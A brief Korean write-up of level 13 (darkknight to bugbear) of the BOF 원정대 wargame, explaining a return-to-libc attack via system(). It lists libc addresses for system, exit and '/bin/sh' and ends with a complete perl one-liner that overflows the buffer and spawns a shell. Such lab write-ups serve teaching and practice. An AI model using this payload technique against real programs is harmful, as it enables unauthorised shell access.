[BOF 원정대] darkknight-> bugbear(level 13)

system()을 이용한 RTL 문제이다.

스택에서 ret에 system의 주소를 적을 때 그 매개변수로 8바이트 뒤에있는 값을 사용한다는 것만 명심하면 쉽게 풀 수 있다.

system : 0x40058ae0

exit : 0x400391e0

/bin/sh : 0x400fbff9

공격 코드

./bugbear `perl -e 'print "A"x44, "\xe0\x8a\x05\x40\xe0\x91\x03\x40\xf9\xbf\x0f\x40"'`